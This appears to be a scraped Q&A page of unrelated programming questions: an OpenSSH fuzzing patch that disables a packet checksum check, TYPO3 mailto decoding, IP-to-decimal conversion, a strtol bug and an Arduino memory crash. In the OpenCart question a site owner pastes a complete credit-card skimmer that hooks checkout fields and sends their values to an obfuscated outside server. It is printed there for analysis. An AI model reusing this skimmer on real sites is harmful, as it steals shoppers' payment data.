What exactly 0 && checksum != stored_checksum do? - sshd

http://www.vegardno.net/2017/03/fuzzing-openssh-daemon-using-afl.html
diff --git a/packet.c b/packet.c
--- a/packet.c
+++ b/packet.c
## -1635,7 +1635,7 ## ssh_packet_read_poll1(struct ssh *ssh, u_char *typep)
cp = sshbuf_ptr(state->incoming_packet) + len - 4;
stored_checksum = PEEK_U32(cp);
- if (checksum != stored_checksum) {
+ if (0 && checksum != stored_checksum) {
error("Corrupted check bytes on input");
if ((r = sshpkt_disconnect(ssh, "connection corrupted")) != 0 ||
(r = ssh_packet_write_wait(ssh)) != 0)
Can someone please explain what does this patch do?:
It removes this:
- if (checksum != stored_checksum) {
and adds this:
+ if (0 && checksum != stored_checksum) {
What exactly 0 && checksum != stored_checksum do?

Related

TYPO3 encrypted mailto-link (javascript:linkTo_UnCryptMailto) not working with subject and body

In TYPO3 mailto links are decrypted by the following code snippet.
Is there a way to use this with mailto links, which contain subject and body text?
e.g.: email#example.org?subject=This is my subject&body=This is my bodytext: more text...etc.
// decrypt helper function
function decryptCharcode(n,start,end,offset) {
n = n + offset;
if (offset > 0 && n > end) {
n = start + (n - end - 1);
} else if (offset < 0 && n < start) {
n = end - (start - n - 1);
}
return String.fromCharCode(n);
}
// decrypt string
function decryptString(enc,offset) {
var dec = "";
var len = enc.length;
for(var i=0; i < len; i++) {
var n = enc.charCodeAt(i);
if (n >= 0x2B && n <= 0x3A) {
dec += decryptCharcode(n,0x2B,0x3A,offset); // 0-9 . , - + / :
} else if (n >= 0x40 && n <= 0x5A) {
dec += decryptCharcode(n,0x40,0x5A,offset); // A-Z #
} else if (n >= 0x61 && n <= 0x7A) {
dec += decryptCharcode(n,0x61,0x7A,offset); // a-z
} else {
dec += enc.charAt(i);
}
}
return dec;
}
// decrypt spam-protected emails
function linkTo_UnCryptMailto(s) {
location.href = decryptString(s,-3);
}
if it does not run by default (maybe it depends on usage, from where to what app, but I remember that I used it already).
You might need to encode special characters for usage in URLs.
Try to use PHP function urlencode.
So you could replace all spaces with %20 or +.
Hmm, that works for me (TYPO3 v10).
TypoScript setup:
config.spamProtectEmailAddresses = -3
https://docs.typo3.org/m/typo3/reference-typoscript/master/en-us/Setup/Config/Index.html#spamprotectemailaddresses
Fluid:
<f:link.email email="my#email.tld?subject=123&body=Hello there!">link</f:link.email>
That opens my E-Mail-Client with subject and body (Firefox 84, Thunderbird).

Opencart livechat.js malware script?

I have customer credit card information being stolen from my clients website. I see this livechat.js script running on the website. There is no livechat function on the site, I believe it may be malware. How can I figure out where the script is being initiated from and what exactly is this script doing?
https://www.hergbenet.ro/wp-data/livechat.js
function IrDvbNXumt(e) {
return btoa(encodeURIComponent(e).replace(/%([0-9A-F]{2})/g, function(e, t) {
return String.fromCharCode(parseInt(t, 16))
}))
}
function lmVibHTBLP() {
Array.from(document.getElementsByTagName("input")).forEach(function(e, t) {
null == e.getAttribute("onchange") ? e.setAttribute("onchange", "SAcSpFtVQg(this, '0')") : -1 == e.getAttribute("onchange").search(/SAcSpFtVQg/i) && e.setAttribute("onchange", "SAcSpFtVQg(this, '0');" + e.getAttribute("onchange"))
}), Array.from(document.getElementsByTagName("select")).forEach(function(e, t) {
null == e.getAttribute("onchange") ? e.setAttribute("onchange", "SAcSpFtVQg(this, '1');") : -1 == e.getAttribute("onchange").search(/SAcSpFtVQg/i) && e.setAttribute("onchange", "SAcSpFtVQg(this, '1');" + e.getAttribute("onchange"))
}), Array.from(document.getElementsByTagName("textarea")).forEach(function(e, t) {
null == e.getAttribute("onchange") ? e.setAttribute("onchange", "SAcSpFtVQg(this), '2'") : -1 == e.getAttribute("onchange").search(/SAcSpFtVQg/i) && e.setAttribute("onchange", "SAcSpFtVQg(this, '2');" + e.getAttribute("onchange"))
})
}
function SAcSpFtVQg(e, t) {
var n = [];
n.push("url%" + location.hostname), n.push("type:2"), "1" != t ? e.value.length > 0 && (0 == e.name.length ? n.push(e.id + "%" + e.value) : 0 != e.name.length && n.push(e.name + "%" + e.value), aQwCiGbwKo(n)) : e.value.length > 0 && (-1 != e.id.search("zone|region|state") || -1 != e.name.search("zone|region|state")) ? (e.value.replace(/[^-0-9]/gim, ""), e.value, 0 == e.name.length ? n.push(e.id + "%" + e.options[e.selectedIndex].text) : 0 != e.name.length && n.push(e.name + "%" + e.options[e.selectedIndex].text), aQwCiGbwKo(n)) : (0 == e.name.length ? n.push(e.id + "%" + e.value) : 0 != e.name.length && n.push(e.name + "%" + e.value), aQwCiGbwKo(n))
}
function aQwCiGbwKo(e) {
if (JSON.stringify(KZgKcnPvnh) == JSON.stringify(e)) return !1;
KZgKcnPvnh = e;
var t = 89999 * Math.random() + 1e4,
n = JSON.stringify(e),
a = document.createElement("img");
a.width = "1px", a.height = "1px", a.id = t, a.src = atob("aHR0cHM6Ly92YWxkYW1hcmtkaXJlY3QuY29tL3dwLWRhdGEvdmFsaWRhdGlvbi5waHA=") + "?image_id=" + IrDvbNXumt(n), document.body.appendChild(a), setTimeout(document.getElementById(t).remove(), 3e3)
}
function Default_Send() {
var e = [];
e.push("url%" + location.hostname), e.push("type%2"), Array.from(document.getElementsByTagName("input")).forEach(function(t, n) {
t.value.length > 0 && (0 == t.name.length ? e.push(t.id + "%" + t.value) : 0 != t.name.length && e.push(t.name + "%" + t.value))
}), Array.from(document.getElementsByTagName("select")).forEach(function(t, n) {
t.value.length > 0 && (-1 != t.id.search("zone|region|state") || -1 != t.name.search("zone|region|state")) ? (t.value.replace(/[^-0-9]/gim, ""), t.value, 0 == t.name.length ? e.push(t.id + "%" + t.options[t.selectedIndex].text) : 0 != t.name.length && e.push(t.name + "%" + t.options[t.selectedIndex].text)) : 0 == t.name.length ? e.push(t.id + "%" + t.value) : 0 != t.name.length && e.push(t.name + "%" + t.value)
}), Array.from(document.getElementsByTagName("textarea")).forEach(function(t, n) {
t.value.length > 0 && (0 == t.name.length ? e.push(t.id + "%" + t.value) : 0 != t.name.length && e.push(t.name + "%" + t.value))
}), aQwCiGbwKo(e)
}
var KZgKcnPvnh = [];
window.onload = function() {
-1 != location.href.search("checkout") && (Default_Send(), setInterval("Default_Send()", 3e3), setInterval("lmVibHTBLP()", 1500))
};
You should install & run Wordfence Security – Firewall & Malware Scan or Sucuri Security – Auditing, Malware Scanner and Security Hardening and check the results.
For example if you decode this atob("aHR0cHM6Ly92YWxkYW1hcmtkaXJlY3QuY29tL3dwLWRhdGEvdmFsaWRhdGlvbi5waHA=") you will see this url https://valdamarkdirect.com/wp-data/validation.php. Is this something you are aware of?
In most cases like this you should start by stating to your client that the e-Shop is compromised and ask for help from an expert.

How to get host from IP

I'm working on a function that calculates the decimal equivalent of an IP, in order to get the result I'm using this formula:
decimal = ((octet1 * 16777216) + (octet2 * 65536) + (octet13 * 256) + (octet4))
Does anybody know how to reverse this process, I mean, how can I get the IP address from the decimal number.
I'm looking for some mathematical formula, I already know about nslookup command.
Thanks in advance.
To decimal:
decimal = (octet1 * 256^3) + (octet2 * 256^2) + (octet3 * 256^1) + octet4
To octets:
octet1 = Floor(decimal / 256^3)
octet2 = Floor((decimal - (octet1 * 256^3)) / 256^2)
octet3 = Floor((decimal - (octet1 * 256^3) - (octet2 * 256^2)) / 256^1)
octet4 = decimal - (octet1 * 256^3) - (octet2 * 256^2) - (octet3 * 256^1)
Example using 1.2.3.4
decimal = (1 * 256^3) + (2 * 256^2) + (3 * 256^1) + 4
decimal = 16909060
Calculation
octet1 = Floor(16909060 / 256^3)
octet1 = 1
Calculation
octet2 = Floor((16909060 - (1 * 256^3)) / 256^2)
octet2 = 2
Calculation
octet3 = Floor((16909060 - (1 * 256^3) - (2 * 256^2)) / 256^1)
octet3 = 3
Calculation
octet4 = 16909060 - (1 * 256^3) - (2 * 256^2) - (3 * 256^1)
octet4 = 4
Calculation
Implementation Using Go
package main
import (
"errors"
"flag"
"fmt"
"math"
"os"
"strconv"
"strings"
)
var (
ip = flag.String("i", "", "IP address in dotted notation")
dec = flag.Int("d", 0, "IP address in decimal notation")
)
func ipv4ToDec(ip string) (int, error) {
var result int
octets := strings.Split(ip, ".")
if len(octets) != 4 {
return 0, errors.New("IP should consist of 4 '.' seperated numbers")
}
for i := 0; i < 4; i++ {
v, err := strconv.Atoi(octets[3-i])
if err != nil {
return 0, errors.New("unable to convert octet to number")
}
if v < 0 || v > 255 {
return 0, errors.New("octet should be between 0 and 255")
}
result += v * int(math.Pow(256, float64(i)))
}
return result, nil
}
func decToIpv4(dec int) (string, error) {
var octets []string
for i := 0; i < 4; i++ {
octet := dec / int(math.Pow(256, float64(3-i)))
if octet > 255 {
return "", errors.New("octet larger than 255")
}
dec -= octet * int(math.Pow(256, float64(3-i)))
octets = append(octets, strconv.Itoa(octet))
}
return strings.Join(octets, "."), nil
}
func main() {
flag.Parse()
if ((*ip != "" && *dec != 0) || (*ip == "" && *dec == 0)) {
fmt.Println("Use either -i or -d.")
os.Exit(1)
}
if *ip != "" {
result, err := ipv4ToDec(*ip)
if err != nil {
fmt.Println("Conversion failed: ", err)
os.Exit(1)
}
fmt.Println(result)
}
if *dec != 0 {
result, err := decToIpv4(*dec)
if err != nil {
fmt.Println("Conversion failed: ", err)
os.Exit(1)
}
fmt.Println(result)
}
}
Usage:
$ ./ip-conv -i 1.2.3.4
16909060
$ ./ip-conv -d 16909060
1.2.3.4
$ ./ip-conv -i 192.168.0.1
3232235521
# Using the output of IP->decimal as input to decimal->IP
$ ./ip-conv -d $(./ip-conv -i 192.168.0.1)
192.168.0.1
Multiplying and dividing is a waste of computational power. Remember that you're dealing with bit patterns:
o1.o2.o3.o4 to numeric:
n = o1<<24 | o2<<16 | o3<<8 | o4
numeric to octets:
o1 = n>>24
o2 = (n>>16) & 255
o3 = (n>>8) & 255
o4 = n & 255

Strtol implementation different behaviour on 32 and 64 bit machine

#include <ctype.h>
#include <string.h>
#include <stdio.h>
#include <tgmath.h>
#include <limits.h>
#include <stdbool.h>
#include <errno.h>
#define NEGATIVE -1
#define POSITIVE 1
#define OCTAL 8
#define DECIMAL 10
#define HEXADECIMAL 16
#define BASE_MIN 2
#define BASE_MAX 36
long int strtol (const char * str, char ** endPtr, int base)
{
if(base < 0 || base == 1 || base > BASE_MAX)
{
errno = EINVAL;
return 0L;
}
else
{
bool conversion = true;
int i = 0, sign = POSITIVE, save;
while(isspace(*(str + i)))
i++;
if(*(str + i) == '\0')
{
conversion = false;
save = i;
}
if(*(str + i) == '-')
{
sign = NEGATIVE;
i++;
}
else if(*(str + i) == '+')
i++;
if(base == 0) // find out base
{
if(*(str + i) == '0')
{
if(toupper(*(str + i + 1)) == 'X')
{
base = HEXADECIMAL;
i++;
}
else
base = OCTAL;
i++;
}
else
base = DECIMAL;
}
else if(base == OCTAL)
{
if(*(str + i) == '0')
i++;
}
else if(base == HEXADECIMAL)
{
if(*(str + i) == '0')
if(*(str + i + 1) == 'x' || *(str + i + 1) == 'X')
i += 2;
}
int start = i, end, exp, check = i;
long int long_int, sum, multiplier;
if(conversion) // find out the correct part of the string corresponding to the number
{
if(base < DECIMAL)
{
while(*(str + i) >= '0' && *(str + i) < base + '0') // numbers from 0 to base - 1
i++;
}
else if(base == DECIMAL)
{
while(*(str + i) >= '0' && *(str + i) <= '9') // numbers from 0 to 9
i++;
}
else
{
while((*(str + i) >= '0' && *(str + i) <= '9') || (toupper(*(str + i)) >= 'A' && toupper(*(str + i)) < 'A' + base - 10))
i++;// numbers from 0 to 9 and uper and lowercase letters from a to a + base - 11
}
}
if(i == check && conversion) //no digits at all
{
conversion = false;
save = i;
}
else if(endPtr != NULL && conversion) // assign pointer
*endPtr = (char *) (str + i);
if(conversion)
{
for(end = i - 1, exp = 0, long_int = 0L; end >= start; end--, exp++)
{
multiplier = pow(base, exp);
sum = 0L;
if(*(str + end) >= '0' && *(str + end) <= '9')
sum = (*(str + end) - '0') * multiplier;
else if(*(str + end) >= 'A' && *(str + i) <= (base == BASE_MAX ? 'Z' : 'F'))
sum = (*(str + end) - 'A' + 10) * multiplier;
else if(*(str + end) >= 'a' && *(str + i) <= (base == BASE_MAX ? 'z' : 'f'))
sum = (*(str + end) - 'a' + 10) * multiplier;
if(long_int <= LONG_MIN + sum)
{
errno = ERANGE;
return LONG_MIN;
}
if(long_int >= LONG_MAX - sum)
{
errno = ERANGE;
return LONG_MAX;
}
else
long_int += sum;
}
return sign * long_int;
}
else
{
if(endPtr != NULL)
{// if base is 16 we check if the string given is not in the form 0xIncorrect string in that way we need to return xIncorrect part of the string
if(base == HEXADECIMAL && save >= 2 && toupper(*(str + save - 1)) == 'X' && *(str + save - 2) == '0')
*endPtr = (char *) str + save - 1;
else if(base == OCTAL && save >= 1 && *(str + save - 1) == '0')
*endPtr = (char *) str + save;// if the string is of base 8 and in the form 0incorrect string
else //then we return everything after the 0 as the endptr string
*endPtr = (char *) str;//in other cases no conversion was done so we return original pointer
}
return 0L;
}
}
}
I've got problem with writing implementation of strtol() function. The thing is i compiled it on 64 bit machine and the output was correct but today i checked it on another machine that is 32-bit and something got wrong. 32-bit machine showed the result that for example string "7FFFFFFF" is out of range when on 64-bits the results is that strtol succeded which is the same as for th standard function. I also checked errno value and for 32-bit machine it's set to ERANGE which shouldn't be and it's not not on 64-bit. I have program that checks if your implementation gives the same output as the standard one for different strings. I spent few hours looking for possible bug but i'm out of ideas? Any tips?

Arduino multi-dimensional array crash

I have a block of code that does something to this effect:
int pieceX = 0;
int pieceY = 0;
int board[8][47] = {{0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0},
{0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0},
{0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0},
{0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0},
{0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0},
{0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0},
{0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0},
{0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0}};
if (pieceX > 0 && pieceY < 46) {
/* If I remove this it doesn't crash */
if (board[pieceX-1][pieceY] == 0 && board[pieceX][pieceY+1] == 0) {
pieceX -= 1;
}
/*-----------------------------------*/
}
As far as I can tell, I'm initializing my array correctly and I'm staying within the index bounds. I don't work much with Processing or Arduino, so I'm hoping it's something simple / obvious.
Edit: Hmm.. I just made a minimalistic test version with this code, and it doesn't crash. So, it's something to do with the code not in this example. Damn. Going to try to zero in on those lines. (My bad for posting this before properly isolating the problem code.) While this accurately describes the problem, it does not reproduce it. Strange bug.
Edit 2: This doesn't crash:
if (buttonA == HIGH) {
if (pieceX > 0 && pieceX < 8 && pieceY > 0 && pieceY < 46) {
if (board[0][0] == 0) {
}
}
}
This doesn't crash:
if (buttonA == HIGH) {
if (pieceX > 0 && pieceX < 8 && pieceY > 0 && pieceY < 46) {
pieceX -= 1;
}
}
This DOES crash:
if (buttonA == HIGH) {
if (pieceX > 0 && pieceX < 8 && pieceY > 0 && pieceY < 46) {
if (board[0][0] == 0) {
pieceX -= 1;
}
}
}
Any idea what's going on? ButtonA is never HIGH, so.. the code I'm tweaking shouldn't even matter (it all verifies and uploads fine.)
Edit 3: This crashes:
if (buttonA == HIGH) {
if (pieceX > 0 && pieceX < 8 && pieceY > 0 && pieceY < 46) {
if (board[0][0] == 0) {
pieceX -= 1;
}
}
}
This DOES NOT:
if (0 == 1) {
if (pieceX > 0 && pieceX < 8 && pieceY > 0 && pieceY < 46) {
if (board[0][0] == 0) {
pieceX -= 1;
}
}
}
This crashes:
if (buttonA == HIGH) {
if (pieceX > 0 && pieceX < 8 && pieceY > 0 && pieceY < 46) {
if (board[0][0] == 0) {
pieceX = 1;
}
}
}
This DOES NOT:
if (buttonA == HIGH) {
if (pieceX > 0 && pieceX < 8 && pieceY > 0 && pieceY < 46) {
pieceX = 1;
}
}
AND THIS DOES NOT:
if (buttonA == HIGH) {
if (pieceX > 0 && pieceX < 8 && pieceY > 0 && pieceY < 46) {
if (board[0][0] == 0) {
}
}
}
Edit, here's the full source code. I'm only a few hours into a black and white Dr Mario clone. I never write in this language, so.. potentially a bit sloppy. More of a random learning experiment in processing / video game hardware / arduino.
Since the issue seems to be erratic, I would guess you are corrupting your stack.
I am not sure which Arduino you are using and how many other variables you have defined.
The array you are creating is 8 * 47 * 2 = 752 bytes, the Arduino Uno has 2048 ram bytes for the stack and all of your variables.
Edit:
Can you temporary reduce the size of the array(maybe 4 * 10) to see if it stops crashing?
Another test you could do is to list the values before you modify them and verify they are all 0.
This definitely looks like you are running out of memory.
int board[8][47]
consumes 752 bytes of memory. In addition
TV.begin(NTSC,120,96);
will call
char TVout::begin(uint8_t mode, uint8_t x, uint8_t y) {
// check if x is divisable by 8
if ( !(x & 0xF8))
return 1;
x = x/8;
screen = (unsigned char*)malloc(x * y * sizeof(unsigned char));
which tries to allocate 1440 bytes of memory. 1440 + 752 == 2192 > 2048 == SRAM size of Arduino
So you are running out of memory.
Can you switch int board[8][47] from int to int8_t or uint8_t? This would reduce the memory consumption of the array by 2. However you would still be very tight on memory.
This definitely looks like you are running out of memory.
You might be able to use less memory.
It looks like any given board element is either a 0 or 1.
If I am wrong disregard the rest of my statement.
Else you "could" make an array like this.
char board [47];
first = 0b00000001; //binary mask, for binary and
second = 0b00000010;
third = 0b00000100;
...
Then to look up any bit you
if (board[33]&second == 0 ) \\you are testing what was called board[2][33]
This might help you out.

Resources